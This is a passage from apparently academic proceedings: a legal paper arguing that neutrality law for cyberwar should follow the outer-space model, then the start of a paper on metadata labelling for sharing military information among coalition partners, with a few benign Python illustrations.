revolutions in military affairs. (Boot 2006, p. 8) The longbow, stirrups, gunpowder, conoidal bullets,<br />
machine guns, aircraft, radar, sonar, rockets and spacecraft, and now computers and precision-guided
weapons, are but a small sample of the technologies that have continuously changed the face
of warfare throughout history. As warfare became the province of nation-states, belligerencies<br />
between and among nations led to some states declaring their intent to remain neutral, and the<br />
development of conditions under which their neutrality was recognized by the belligerents and other<br />
conditions under which neutrality was lost. This paper addresses modern concepts of neutrality, and<br />
explores the potential for, and perhaps need to, change our concepts of neutrality in the context of<br />
cyberwar as information technologies change warfare as it was previously practiced.<br />
War is “a condition of armed hostility between States,” (Hyde 1945, p. 1686. Cited in Elsea &<br />
Grimmett 2007, p. 23) or “a contention, through the use of armed force, between states, undertaken<br />
for the purpose of overpowering another.” (von Glahn 1992. p. 669. Cited in Elsea & Grimmett 2007,<br />
p. 23) War is “an armed conflict, or a state of belligerence, between two factions, states, nations,<br />
coalitions or combinations thereof. Hostilities between the opponents may be initiated with or without<br />
a formal declaration by any of the parties that a state of war exists.” (Dupuy, p. 261) Marcus Tullius<br />
Cicero (106-43 BCE) famously said in an oration, Pro Tito Annio Milone ad iudicem oratio (Pro<br />
Milone), in defense of Titus Annius Milo, who had been accused of murdering Publius Clodius<br />
Pulcher, a political enemy, “Silent enim leges inter arma” (the law is silent in times of war), (Clark<br />
1907) but his assertion wasn’t true in antiquity, and isn’t true today.<br />
Except in limited conditions, war was made illegal by the Charter of the United Nations, which is a<br />
treaty among the world’s nations signed in the aftermath of World War II, a terrible conflict in which<br />
some fifty million (perhaps as many as eighty million) died worldwide. (White 2005) Article 2(4) of the<br />
Charter provides that, “All Members shall refrain in their international relations from the threat or use<br />
of force against the territorial integrity or political independence of any state, or in any other manner<br />
inconsistent with the Purposes of the United Nations.” However, Article 51 permits the use of military
force in self-defense, and Article 42 permits military force when it is authorized by the
Security Council.
When military force is used, its use is subject to other treaties that limit the nature and extent of force<br />
that may be employed in achieving military objectives. Philosophers, statesmen and military<br />
commanders have struggled to balance the destructive forces of armed combat with national and<br />
international humanitarian concerns, (Kolb 1997, n. 3) leading to the twin concepts of jus ad bellum —<br />
“the conditions under which belligerents might justly resort to the use of armed force as a means of<br />
conflict resolution” (Hensel 2008, p. 5) — and jus in bello —“the conditions for the just employment of<br />
armed force at the strategic, operational and tactical levels during periods of armed hostilities” (Hensel<br />
2008, p. 5) — that together comprise the notions of just war. The notion of jus in bello (“justice in war”)
was known to Sun Tzu in 4th-century BCE China. (Giles) Even so, the concept of jus in bello was
slower to develop than jus ad bellum. In addition to the United Nations Charter, limitations on the
use of military force include inter alia the Geneva Conventions and Protocols, and the Hague<br />
Conventions.<br />
2. Cyberwar<br />
As human beings have moved into cyberspace, they have begun to engage in all the usual types of<br />
human behavior, good and bad, allowed by the technology: communicating, working, contracting,<br />
playing, and socializing, as well as stealing, breaching contracts, engaging in tortious behavior, and<br />
invading other users’ privacy. Now, nation-states are looking at cyberspace as a place to conduct
warfare operations, and terrorists are examining the possibilities inherent in asymmetric attacks
through cyberspace on critical infrastructures.
The “nature” of cyberspace, however, differs in significant ways from the physical, electrical, chemical,<br />
and photonic properties of “real” space. Communications across the Internet take the form of packets<br />
containing addressing and administrative data as well as the intended bits being exchanged. ("What is<br />
a packet?") The paths taken by packets exchanged across the Internet are under the control of<br />
algorithms within the switches that relay the packets. (Tyson 2001) The paths are neither known to<br />
nor controllable by the users of the network.<br />
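The “addressing and administrative data” every packet carries can be made concrete by decoding the fixed 20-byte IPv4 header; the sketch below unpacks a hand-built header with Python’s struct module.

```python
import socket
import struct

def parse_ipv4_header(raw: bytes) -> dict:
    """Decode the fixed portion of an IPv4 header: version, TTL,
    protocol number, and the source/destination addresses that
    routers -- not users -- act on when choosing a path."""
    (ver_ihl, _tos, _total_len, _ident, _flags_frag,
     ttl, proto, _cksum, src, dst) = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    return {
        "version": ver_ihl >> 4,
        "ttl": ttl,
        "protocol": proto,
        "src": socket.inet_ntoa(src),
        "dst": socket.inet_ntoa(dst),
    }
```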
Traditional approaches developed in real space for responding to misbehavior are hampered in<br />
cyberspace by difficulties in attribution, and only a loose correlation exists between “location” in<br />
cyberspace and location of users and cyber equipment within traditional legal jurisdictions. These<br />
realities will certainly impact the development of weapons, strategies, doctrines and tactics for use in<br />
cyberwar and countering cyberterrorism. Nevertheless, nations will undoubtedly seek to exercise and<br />
enhance national power by means of information operations in cyberspace, and the laws of armed<br />
conflict that have served civilized nations well in real space must be examined to determine how they<br />
can be used, and if they must be changed, to meet the realities of cyberwar and cyberterrorism. This<br />
paper will specifically address the legal issues associated with nation-state neutrality as applicable to<br />
these new realities.<br />
3. Neutrality during periods of belligerency<br />
“Neutrality” refers to concepts in customary international law and treaty law concerning the non-participation
of some nations in warfare when a state of belligerency exists among other nations. The
laws of neutrality presuppose the coexistence of war and peace – belligerents and their allies at war<br />
with other belligerents and their allies, while diplomacy, commerce, communications and so forth<br />
continue with and among nations not involved in the belligerencies, both neutral states with other<br />
neutral nations and neutral states with the belligerents. (Neff 2000, p. 1. Cited by Kelsey 2008, p.<br />
1442) Neutrality is a “legal, temporary situation of one state in relation to a conflict between two or<br />
more states. Neutrality consists in not participating directly in the war, through not rendering<br />
assistance to any belligerent party.” (Osmanczyk & Mango 2004, A-F, p. 1547) It may be manifested<br />
by unilateral declaration or by entry into bilateral or multilateral treaties. Grotius identified two rules for<br />
neutrals: (1) neutrals should neither strengthen the position of a belligerent power with an unjust<br />
cause, nor hinder the position of a belligerent with a just cause, (Book III, Chapter XVII (III)(1)) and (2)
warring parties should be treated alike when the cause of the war is in doubt. (Book III, Chapter XVII<br />
(III)(1))<br />
Even before the second half of the 19th century when the laws of war began to be<br />
codified in multilateral treaties, some principles relating to the conduct of armed hostilities<br />
had been included in bilateral treaties.... The rights and duties of neutrality in war,<br />
especially at sea, have been addressed in a large number of bilateral treaties between<br />
states from at least the early 17th century. [Footnote 12: W. E. Hall, The Rights and<br />
Duties of Neutrals, Longman's Green, London, 1874, pages 27-46, in a chapter<br />
surveying the growth of the law affecting belligerent and neutral states to the end of the<br />
18th century, refers to "innumerable treaties" relating to neutrality that were concluded<br />
over several centuries (page 28).] Sometimes, following the conclusion of a bilateral<br />
treaty on neutrality, additional states proceeded [sic] to it. [Footnote 13: For example, on<br />
February 27, 1801 Denmark ceded to the convention between Russia and Sweden for<br />
the Reestablishment of an Armed Neutrality, which had been signed on 16 December<br />
1800. 55 CTS (1799-1801) 411-24.] (Roberts & Guelff 1982, p. 4)<br />
The law of neutrality was eventually codified in the Hague Conventions of 1907, including No. 3,<br />
Convention Relative to the Opening of Hostilities (requiring notice to neutrals of a state of war); No.<br />
11, Convention Relative to Certain Restrictions with Regard to the Exercise of the Right of Capture in<br />
Naval War; and especially No. 5, Convention Respecting Rights and Duties of Neutral Powers and<br />
Persons in Case of War on Land. (The Avalon Project)<br />
Having assumed a position of neutrality, a nation must not allow transit of military forces or equipment<br />
by belligerents across its land territory or the airspace above its land territory. The rules with respect<br />
to belligerent naval vessels, and aircraft flying over a neutral’s territorial waters and exclusive<br />
economic zones, are more complicated. The notion of transit passage applies to “straits which are<br />
used for international navigation between one part of the high seas or an exclusive economic zone<br />
and another part of the high seas or an exclusive economic zone.” (UNCLOS 1982, Art. 37) Ships and<br />
aircraft operated by belligerent nations may transit the territorial waters of a neutral state “solely for<br />
the purpose of continuous and expeditious transit of the strait . . . .” (UNCLOS 1982, Art. 38) During<br />
transit passage, ships and aircraft must: “proceed without delay . . ., refrain from any threat or use of<br />
force against the sovereignty, territorial integrity or political independence of States bordering the<br />
strait . . ., and refrain from any activities other than those incident to their normal modes of continuous<br />
and expeditious transit unless rendered necessary by force majeure or by distress.” (UNCLOS 1982,<br />
Art. 39)<br />
The notion of innocent passage applies to passage through the territorial waters of a neutral state and<br />
is permitted “so long as it is not prejudicial to the peace, good order or security of the coastal State.”<br />
(UNCLOS 1982, Art. 19) Passage is not innocent if it involves “any threat or use of force against the<br />
sovereignty, territorial integrity or political independence of the coastal State . . ., any exercise or<br />
practice with weapons of any kind, . . . any act of propaganda aimed at affecting the defence or<br />
security of the coastal State, . . . the launching, landing or taking on board of any aircraft [or] military<br />
device, [or] any act aimed at interfering with any systems of communication or any other facilities or<br />
installations of the coastal State.”(UNCLOS 1982, Art. 19)<br />
Once a state decides on a position of neutrality, it must take steps to prevent its territory<br />
from becoming a base for military operations of a belligerent. It must prevent the<br />
recruiting of military personnel, the organizing of military expeditions, and the<br />
constructing, outfitting, commissioning, and arming of warships for belligerent use. A<br />
neutral state is under no obligation to prevent private persons or companies from<br />
advancing credits or selling commodities to belligerents. Such sales are not illegal under<br />
the international law of neutrality. A neutral state may, if it chooses, go beyond the<br />
requirements of international law by placing an embargo upon some or all sales or<br />
credits to belligerents by its nationals. If it does so, it has the obligation to see that<br />
legislation, commonly referred to as neutrality laws, is applied impartially to all<br />
belligerents. Once enacted, neutrality laws are not to be modified in ways that would<br />
advantage one party in the war. (Neutrality 2008)<br />
There is a limited communications exception in the law of neutrality for communications by<br />
belligerents and their allies across the land territory of neutral states. Hague Convention V, Article 8,<br />
provides, “A neutral Power is not called upon to forbid or restrict the use on behalf of the belligerents<br />
of telegraph or telephone cables or of wireless telegraphy apparatus belonging to it or to companies<br />
or private individuals.” The Internet did not exist when the Hague Conventions were written, of course,<br />
but arguably this exception applies to Internet communications as well as telegraph and telephone<br />
communications. The nature and scope of this exemption is a key issue for neutrality in the context of<br />
cyberspace.<br />
4. Neutrality in the context of cyberwar<br />
When Hague V(8) was written, communications across the territory of a neutral nation via telegraph or<br />
telephone cables, or by wireless telegraphy, might have involved passing a variety of types of<br />
information. Command and control information might have been passed, for example, or intelligence<br />
or targeting information. Assuming that military units knew their own locations (not necessarily a<br />
reasonable assumption in those days), unit locations may have been reported. In short, information<br />
useful in prosecuting the belligerency, if it could be reduced to textual or numeric form suitable for<br />
transmission across the communications systems in use at that time, could be transmitted without<br />
imposing a burden on the neutral state to recognize or interdict the transmission. Some information<br />
may have been encoded or enciphered, and transmission would have necessarily been slow by<br />
today’s standards, but fast relative to other media and transmission capabilities available at the time<br />
(foot, horseback, railroad, ship). (Lail 2002, p. 4)<br />
Fast forward to the twenty-first century, and the ability to pass useful information across the Internet is<br />
much enhanced. Now not just text and numbers may be communicated, but sound to at least the<br />
level of voice recognition, imagery including high-quality color pictures, and measurement and<br />
telemetry data, such as GPS data, can be communicated quickly and easily across the Internet.<br />
Perhaps more importantly, tools and even weapons themselves, perhaps in the form of malware, can<br />
be moved across the territory of neutrals and belligerents alike using the Internet. Those engaged in<br />
such Internet communications do not, and for the most part cannot, know the path the packets<br />
comprising their communications will take, much less can they control the path. In fact, some of the<br />
packets may take different paths from other packets that are part of the same transmission, all<br />
transparent to and beyond the control of those engaged in the communication.<br />
Historically, warfare has involved the use of kinetic weapons (e.g. projectiles) to kill and destroy.<br />
Modern warfare continues to use kinetic weapons, but may also use energy weapons – lasers, for<br />
example; but note that Protocol IV of the 1980 Convention on Certain Conventional Weapons<br />
specifically outlaws the use of blinding lasers – or may use logic weapons to attack and defend cyber-dependent<br />
infrastructures. In modern warfare, information operations may be used in connection<br />
with kinetic operations (as in the confrontation between Russia and Georgia in 2008), (Tikk 2010, p.<br />
66ff) or can be used without ancillary kinetic operations (as in the confrontation between Russia and<br />
Estonia in 2007). (Tikk 2010, p. 14ff) It is highly probable that we will never again see kinetic<br />
operations of any great extent without a cyber component. Whether information operations among<br />
nation-states without “armed conflict” will be deemed to be warfare probably depends upon the level<br />
of destruction realized. (Article 51 of the United Nations Charter uses the expression “armed attack” to<br />
justify war in self-defense by nation-states. However, the expression is not defined. It is not clear that<br />
it is proper, or desirable, to view a purely cyber incident as an armed attack. See Wingfield 2006, p.<br />
12. See also Sullivan 2010) Information operations among, between or with non-nation-states cannot,<br />
by definition, be war, regardless of the level of destruction attained or the use of uniformed military<br />
personnel by one side or another and despite the common misuse of the term in referring to conflicts<br />
that are not between or among nation-states, as in “the global war on terror” (Rumsfeld Memo 16<br />
October 2003) or the “war on drugs.” (Testimony of OMB Director Nussle)<br />
While belligerents’ use of networks that cross a neutral’s territory can take place without violating the<br />
neutrality status of the nations through whose territory the communications pass, Hague V(8) arguably<br />
did not foresee that that use might include weapons. The rules concerning neutrality require that<br />
passage of weapons or other military materials and equipment across the territory of a neutral must<br />
be interdicted by the neutral state, and if it fails to do so, or is unable to do so, the belligerents against<br />
whom the weapons or materials are to be used have a legal right to attack the transfer. (Brown 2006,<br />
p. 210) Hague V(1) forbids land transfers and Hague V(2) forbids use of the atmosphere. Some<br />
analysts have, therefore, concluded that cyberwar is not permitted under current neutrality law without<br />
a likely violation of the claimed neutrality. (Kelsey 2008, pp. 1441-6) They recommend changes to<br />
bring the law into conformance with the reality of Internet transfers. (Kelsey 2008, pp. 1448-9) One<br />
recommendation would focus on intent: the rules of neutrality would not be violated unless the<br />
belligerent intended to use the information infrastructure of the neutral to deliver the weapons. The<br />
neutral would not have to interdict an unintentional passage, and would not be subject to attack by the<br />
other side based on an unintentional crossing of its territory by the cyber weapons. (Kelsey 2008, pp.<br />
1448-9) This approach seems hopeless to us. The neutral probably has no knowledge that weapons<br />
are passing across its territory, could realistically do nothing if it did know, and has even less access<br />
to knowledge of the belligerent’s intent with respect to the crossing.<br />
However, there is an alternative approach to framing the problem and its solution. Extra-atmospheric<br />
movements of weapons (other than nuclear weapons) and military materials above the territory of<br />
neutrals are permitted without imposing a duty on the neutral to interdict. The United Nations adopted a<br />
“Declaration of Legal Principles Governing the Activities of States in the Exploration and Use of Outer<br />
Space” in 1963. (Wolter 2003, p. 4) The Declaration has since been supplemented by three<br />
resolutions laying down the legal principles applicable to the exploration and exploitation of outer<br />
space, a “Declaration on International Cooperation in the Exploration and Use of Outer Space for the<br />
Benefit and in the Interest of All States, Taking into Particular Account the Needs of Developing<br />
Countries,” and five treaties and agreements governing the use of space and space-related activities.<br />
(United Nations Treaties and Principles on Space Law) These treaties, agreements and principles<br />
are collectively known as the “United Nations Treaties and Principles on Outer Space.” Nuclear<br />
weapons are forbidden, but other weapons (kinetic weapons, lasers) are permitted. (Although nuclear<br />
weapons are banned, it is recognized that some uses of nuclear power are needed in space; the<br />
Treaties and Principles provide for safety in its use, mitigation of risks, and liability for states that fail to<br />
control the nuclear power or its sources.)<br />
The very nature of outer space is such that spacecraft do not have the same ability to control their<br />
flight paths that aircraft operating within the atmosphere have, (Braeunig 1997-2008) and the cost of a<br />
space program that could interdict is large, (Fox 2007) so a rule requiring interdiction of belligerents’<br />
weapons in space by the neutral does not make sense. Spacecraft and satellites in orbit pass above<br />
both belligerents and neutrals and cannot avoid doing so, being subject to the laws of celestial<br />
mechanics. Accordingly, the notions of territorial control that apply in the laws of the sea and the<br />
regulation of aircraft, cannot apply in outer space. If neutrals were required to exercise control over<br />
the use of outer space in the same way they exercise control over air traffic in the skies above their<br />
territories, it would be practically impossible to maintain neutrality at all.<br />
Similarly, it is impossible for neutrals to interdict belligerent Internet use of the neutral’s<br />
information infrastructure without prohibitive costs or unacceptable consequences for the neutral’s licit<br />
use of its own infrastructure: "a state may not be able to prevent [cyber] attacks from leaving its<br />
jurisdiction unless it severs all connections with computer systems in other states." (Brown 2006, p.<br />
210) This indicates that the appropriate rule for Internet use is more like the rule for space than the<br />
rule for air or land traffic, even when the use involves cyber weapons or information useful to the<br />
belligerent for military purposes (telemetry, GPS, weather data, etc.). Such acceptable use would, of<br />
course, apply to all belligerents, because the rules of neutrality prohibit the neutral state favoring one<br />
side in any way over the other side. (Brown 2006, p. 211)<br />
5. Conclusion<br />
Phillip Jessup, in 1936, concluded, "There is nothing new about revising neutrality; it has undergone<br />
an almost constant process of revision in detail." (Jessup 1935-6, p. 156. Cited in Walker 2000, p.<br />
109) With the advent of cyberwar, rules governing neutrality during periods of belligerency need to be<br />
reconsidered and revised yet again. The realities of the Internet age mean that weapons as well as<br />
information can move across communications networks in ways that were not possible or foreseeable<br />
during the earlier evolution of the laws of war and neutrality. Yet the paths that those weapons will<br />
take as they traverse the Internet on the way to their intended targets are beyond the knowledge or<br />
control of the belligerents that launch them. Detection, identification and interdiction by neutrals<br />
across whose territories the weapons may pass are impractical without sacrificing the utility of the<br />
networks for licit use by the neutrals and others, and hence effectively impossible.<br />
However, it is only the details of the rules of neutrality that must change. Neutrals will not be<br />
required to do what they cannot do, and will not be subject to attack when they do not detect, identify<br />
and interdict the flow of weapons through their information infrastructures. The key principle of<br />
neutrality requiring that neutrals do not knowingly and willingly participate in the belligerency, or favor<br />
one side over the other, can and must be retained.<br />
Disclaimer: Opinions expressed in this paper are those of the authors and do not represent positions<br />
of George Washington University, or of the Information Resources Management College, the National<br />
Defense University, the Department of Defense, or the United States Government.<br />
References<br />
The Avalon Project: Documents in Law, History and Diplomacy. Yale Law School, Lillian Goldman Law Library.<br />
http://avalon.law.yale.edu/default.asp.<br />
Boot, Max (2006) War Made New: Technology, Warfare, and the Course of History, 1500 to Today. New York:<br />
Gotham Books.<br />
Braeunig, Robert A. (1997-2008) Orbital Mechanics. http://www.braeunig.us/space/orbmech.htm.<br />
Brown, Davis, A Proposal for an International Convention To Regulate the Use of Information Systems in Armed<br />
Conflict, 47 Harv. Int'l L.J. 179 (2006).<br />
Clark, A. C. (1907) Q. Asconii Pediani Orationum Ciceronis Quinque Enarratio.<br />
http://www.attalus.org/latin/asconius2.html#Milo.<br />
Dupuy, Trevor N. et al. eds. (2003) Dictionary of Military Terms, 2 nd Ed. New York: H.W. Wilson.<br />
Elsea, Jennifer K. & Grimmett, Richard F. (2007) Declarations of War and Authorizations for the Use of Military<br />
Force: Historical Background and Legal Implications. Washington, DC: Congressional Research Service<br />
RL31133. http://www.fas.org/sgp/crs/natsec/RL31133.pdf.<br />
Fox, Bernard et al. (2007) Guidelines and Metrics for Assessing Space System Cost Estimates. Santa Monica,<br />
CA: Rand Corporation. http://www.rand.org/pubs/technical_reports/2008/RAND_TR418.pdf.<br />
The Gale Group, Inc. (2008) West's Encyclopedia of American Law, Edition 2. Farmington Hills, MI: Thomson<br />
Gale. http://legal-dictionary.thefreedictionary.com/neutrality.<br />
Gat, Azar (2006) War in Human Civilization. Oxford: Oxford University Press.<br />
Giles, Lionel (1910) Sun Tzu on the Art of War. http://www.chinapage.com/sunzi-e.html.<br />
Grotius, Hugo (1925) De Jure Belli ac Pacis [Of the Law of War and Peace]<br />
Libri Tres. Oxford: Clarendon Press. [Reproduced as a Special Edition (1984) Birmingham, AL: Legal Classics<br />
Library.] In particular, see Chapter XVII: On Those Who Are of Neither Side in War.<br />
Hall, W. E. (1874) The Rights and Duties of Neutrals, Longman's Green, London.<br />
Hague Convention (V) respecting the Rights and Duties of Neutral Powers and Persons in Case of War on Land.<br />
The Hague, 18 October 1907. http://www.icrc.org/ihl.nsf/FULL/200?OpenDocument.<br />
Hensel, Howard M. (2008) Legitimate Use of Military Force. Surrey, UK:Ashgate Publishing Group.<br />
Hyde, Charles C. (1945) International Law Chiefly as Interpreted and Applied by the<br />
United States, Vol. 3. New York: Hachette Book Group USA (Little Brown & Co.).<br />
International Humanitarian Law - Treaties & Documents by Date. International Committee of the Red Cross.<br />
http://www.icrc.org/ihl.nsf/INTRO?OpenView.<br />
Jessup, Phillip and Deák, Francis (1935-6) Neutrality, Its History, Economics and Law: Vol. IV Today and<br />
Tomorrow. New York: Columbia University Press.<br />
Johnson, Phillip A., et al. (May, 1999) An Assessment of International Legal Issues in Information Operations.<br />
Washington, DC: Department of Defense Office of General Counsel.<br />
Kastenberg, Joshua E. (2009) “Non-Intervention and Neutrality in Cyberspace: An Emerging Principle in the<br />
National Practice of International Law.” 64 A.F. L. Rev. 43.<br />
Keegan, John (1993) A History of Warfare. New York: Alfred A. Knopf.<br />
Kelsey, Jeffrey T. G. (2008) “Hacking into International Humanitarian Law: The Principles of Distinction and<br />
Neutrality in the Age of Cyber Warfare.” 106 Mich. L. Rev. 1427.<br />
Lauterpacht, Hersch, Oppenheim's International Law (7th Ed., 1948) London: Longmans, Green & Co.<br />
Kolb, Robert (1997) “Origin of the twin terms jus ad bellum/jus in bello,” International Review of the Red<br />
Cross, No. 320, p.553-562. Online at<br />
http://www.icrc.org/web/eng/siteeng0.nsf/iwplist163/d9dad4ee8533daefc1256b66005affef.<br />
Lail, Benjamin (2002) Broadband Network and Device Security. Sydney: McGraw-Hill. http://books.mcgrawhill.com/downloads/products/0072194243/0072194243_ch01.pdf.<br />
Neff, Stephen C. (2000) The Rights and Duties of Neutrals. Manchester, UK: Manchester University Press.<br />
Neutrality. (2008) West's Encyclopedia of American Law, Edition 2. http://legaldictionary.thefreedictionary.com/neutrality.<br />
Osmanczyk, Edmund Jan & Mango, Anthony (2004) Encyclopedia of the United Nations and International<br />
Agreements. Florence, Kentucky: Routledge.<br />
Roberts, Adam and Guelff, Richard (1982) Documents on the Laws of War, 3d Ed. Oxford: Oxford University<br />
Press.<br />
“Rumsfeld Memo 16 October 2003” (2008) SourceWatch.<br />
http://www.sourcewatch.org/index.php?title=Rumsfeld_Memo_16_October_2003<br />
Sullivan, Bob (2010) “Could Cyber Skirmish Lead U. S. to War?” http://redtape.msnbc.com/2010/06/imagine-thisscenario-estonia-a-nato-member-is-cut-off-from-the-internet-by-cyber-attackers-who-besiege-the-countrysbandw.html<br />
“Testimony of OMB Director Nussle” (2008) The White House.<br />
http://www.whitehouse.gov/omb/legislative_testimony_director_nussle_021308<br />
Tikk, Eneken et al. (2010) International Cyber Incidents: Legal Considerations. Tallinn: Cooperative Cyber<br />
defence Center of Excellence.<br />
Tyson, Jeff. (April 3, 2001) "How Internet Infrastructure Works" HowStuffWorks.com.<br />
http://computer.howstuffworks.com/internet/basics/internet-infrastructure.htm<br />
United Nations Convention on the Law of the Sea (UNCLOS), (1982)<br />
http://www.un.org/Depts/los/convention_agreements/convention_overview_convention.htm.<br />
United Nations Convention on Prohibitions or Restrictions on the Use of Certain Conventional Weapons Which<br />
May Be Deemed to Be Excessively Injurious or to Have Indiscriminate Effects, Protocol IV (1980).<br />
http://www.un.org/millennium/law/xxvi-18-19.htm.<br />
United Nations Treaties and Principles on Space Law (2010)<br />
http://www.unoosa.org/oosa/en/SpaceLaw/treaties.html<br />
von Glahn, Gerhard (1992) Law Among Nations: An Introduction to Public International Law (<strong>6th</strong> ed.) New York:<br />
Macmillan.<br />
Walker, George K. (November, 2000) “Information Warfare and Neutrality.” 33 Vand. J. Transnat'l L. 1079.<br />
"What is a packet?" (December 1, 2000) HowStuffWorks.com.<br />
http://computer.howstuffworks.com/question525.htm<br />
White, Matthew (2005) Source List and Detailed Death Tolls for the Twentieth Century Hemoclysm.<br />
http://users.erols.com/mwhite28/warstat1.htm.<br />
Wingfield, Thomas C. (2006) “When is a Cyberattack an ‘Armed Attack?’ Legal Thresholds for Distinguishing<br />
Military Activities in Cyberspace.” Cyber Conflict Studies Association.<br />
http://www.docstoc.com/docs/445063/when-is-a-cyberconflict-an-armed-conflict<br />
Wolter, Detlev (2003) Common Security in Outer Space and International Law: A <strong>European</strong> Perspective.<br />
(Geneva: United Nations, UNIDIR/2005/29, 2006)<br />
Labelling: Security in Information Management and<br />
Sharing<br />
Harm Schotanus, Tim Hartog, Hiddo Hut and Daniel Boonstra<br />
TNO Information and Communication Technology, Delft, The Netherlands<br />
Harm.schotanus@tno.nl<br />
Tim.hartog@tno.nl<br />
Hiddo.hut@tno.nl<br />
Daniel.boonstra@tno.nl<br />
Abstract: Military communication infrastructures are often deployed as stand-alone information systems<br />
operating at the System High mode. Network-Enabled Capabilities (NEC) and combined military operations lead<br />
to new requirements for information management and sharing which current communication architectures cannot<br />
deliver. This paper informs information architects and security specialists about an incremental approach<br />
introducing labelling of documents by users to facilitate information management and sharing in security related<br />
military scenarios.<br />
Keywords: labelling, meta-information, information security, cross-domain solutions, information sharing, need-to-protect,<br />
duty-to-share<br />
1. Introduction<br />
This paper presents an overview of the steps to develop a meta-information capability. First, it<br />
presents a broad overview on what meta-information and labelling is and how it can be applied. Then<br />
it focuses on one specific security application of labelling which is secure information exchange, i.e.<br />
selective and regulated information sharing, based on meta-information. We also present a possible<br />
roadmap for implementing a secure information sharing capability based on meta-information. The<br />
purpose of this roadmap is to analyse what ‘ingredients’ are required for implementing such a<br />
capability, i.e. the problems we have identified and the technology that is necessary to solve these<br />
problems.<br />
The importance of sharing information in networked military operations, especially coalition networks,<br />
is commonly recognised. An important driver for future communication architectures is (NATO)<br />
Network-Enabled Capabilities (NNEC)(Buckman 2005). The integrated and coordinated deployment<br />
of all capabilities within a coalition is the central goal, relying heavily upon regulated information<br />
sharing (Schotanus 2009)(Martis 2006). A better integrated communication architecture contributes to<br />
the sharing of relevant military information by making it easier and quicker. But how does confidentiality fit<br />
into this picture? What if a coalition partner does not want to share specific information because<br />
sharing poses a bigger risk for them or for the mission than not sharing or vice versa? Which methods<br />
are available to differentiate between information to-be-shared and information not-to-be-shared? The<br />
primary objective is that the owner of the information remains in control of that information.<br />
Relevant information produced during military coalition operations usually does not originate from a<br />
single partner but is the result of multiple partners working together using some form of online or<br />
offline shared information mechanism like documents distributed via e-mail or digital photos shared<br />
via situational awareness applications. Information is nowadays typically divided amongst the coalition<br />
partners, each creating a separate information domain in which the information is stored and<br />
processed. Such an information domain is usually a standalone network. Transferring information<br />
from one domain to another is often handled by out-of-band means. That may cause more problems than it<br />
solves, as there is little control over the information exchange. Connecting these different domains is a<br />
step that is currently being taken, but it also leads to many problems, not least because of the different<br />
responsibilities for each of these domains. Information sharing without compromising the<br />
confidentiality is a problem that has to be solved by choosing an information management strategy<br />
that is based on the ability to regulate the sharing of information and that cannot be addressed by<br />
infrastructural solutions. In essence, this is caused by the inability of the infrastructure to determine<br />
the value of the information and hence it cannot enforce decisions about whether information can or<br />
cannot be shared with the intended partner.<br />
In the remainder of this paper we will often use the term information domain. This is defined as a<br />
collection of information under one responsibility (e.g. a nation, or organisation) that operates for a<br />
single purpose (e.g. a mission) and has a single security policy.<br />
2. Meta-information and labelling<br />
A new information management strategy could be based on mechanisms that make decisions based<br />
on meta-information instead of on the information itself. By adding relevant meta-information, the user<br />
can effectively control under what conditions information can be released.<br />
Meta-data or meta-information is information about information. For example, a military security<br />
marking (such as NATO SECRET) on the top and bottom of each page of a document is a form of<br />
meta-information because it conveys the classification of the document, in other words it is (security<br />
specific) meta-information about other information. To enable regulated sharing of information<br />
between different information domains or with partners in a coalition, meta-information can be used to<br />
describe certain properties of information objects. These properties can be used to enforce decisions<br />
in a release mechanism whether information should or should not be shared. The meta-information is<br />
often called a label, and the process of creating a label is called labelling. This reflects two important<br />
concepts:<br />
Sharing information between coalition partners presumes a way of deciding whether a specific<br />
information object may or may not be shared.<br />
For each information object a set of properties can be determined that can form the basis of a<br />
decision process for sharing information.<br />
The crucial concept in our labelling approach is that we separate the logic to enforce decisions from<br />
the intelligence to determine the properties of the information. This means we can reduce the<br />
complexity of the decision-making process.<br />
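As a sketch of this separation, the release logic below evaluates only the properties carried by a label and never inspects the information object itself. The `Label` structure, its fields and the partner codes are illustrative assumptions, not part of any actual standard.<br />

```python
from dataclasses import dataclass, field

@dataclass
class Label:
    """Meta-information determined elsewhere (by the user or an analysis step)."""
    classification: str                              # e.g. "NATO SECRET"
    releasable_to: set = field(default_factory=set)  # coalition partners

def may_release(label: Label, partner: str) -> bool:
    # Enforcement logic: decides purely on the label's properties,
    # keeping the decision process simple and content-independent.
    return partner in label.releasable_to

label = Label(classification="NATO RESTRICTED", releasable_to={"NLD", "DEU"})
print(may_release(label, "NLD"))  # True
print(may_release(label, "FRA"))  # False
```

In this split, all intelligence about the information (its classification, its releasability) lives in the label; the release mechanism itself stays trivially small and auditable.<br />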
2.1 Examples of meta-information<br />
The use of properties of the information in addition to the original information, creates new<br />
possibilities. If information objects such as files carry meta-information, for example the type-of-file<br />
(presentation, document or image), file extension (ppt, doc, pdf, jpg), author, security marking, time-of-creation,<br />
then these meta-information properties can be used for making decisions in several<br />
scenarios [see Figure 1].<br />
Figure 1: Examples of information with their meta-information<br />
Because our aim is to both facilitate regulated sharing mechanisms and to present the power and<br />
flexibility of meta-information, we categorised these new possibilities in two categories: use cases<br />
within a single information domain and use cases in federated information domains.<br />
Many software applications already store meta-information within information objects. Image files, for<br />
example, carry resolution information, while photos carry the manufacturer and model of the camera that was<br />
used to take the photo. One problem with proprietary file formats and closed-source applications (e.g.<br />
Microsoft Word) is that the meta-information cannot be easily accessed outside the native software<br />
application because the file is a black box. A second problem is that each file format will have its own<br />
approach to storing meta-information. That implies that a labelling solution has to be adjusted for<br />
every format. A solution to this problem is an application-independent approach where the meta-information is<br />
stored in a separate object. Storing meta-information separately from information objects in a<br />
standardised format also improves the flexibility to work with meta-information without having to<br />
depend on the knowledge of the file format or implementation in software.<br />
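A minimal sketch of such a separately stored label, assuming a JSON sidecar file next to the information object. The field names and the `.label` suffix are invented for illustration; a real deployment might use the XML labelling NATO has proposed, JSON is used here only for brevity.<br />

```python
import json
from pathlib import Path

def write_label(data_file: str, meta: dict) -> Path:
    """Store meta-information in a separate, standardised sidecar file,
    so it can be read without any knowledge of the data file's format."""
    sidecar = Path(data_file).with_suffix(Path(data_file).suffix + ".label")
    sidecar.write_text(json.dumps(meta, indent=2))
    return sidecar

meta = {"type": "document", "extension": "doc",
        "author": "Kees de Witte", "marking": "NATO SECRET",
        "created": "2010-06-15"}
path = write_label("report.doc", meta)         # -> report.doc.label
print(json.loads(path.read_text())["marking"])  # NATO SECRET
```

Because the sidecar is plain structured text, any tool in the processing chain can read the label without opening the (possibly proprietary, black-box) data file itself.<br />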
In certain use-case scenarios where third parties need to process another party’s meta-data, a<br />
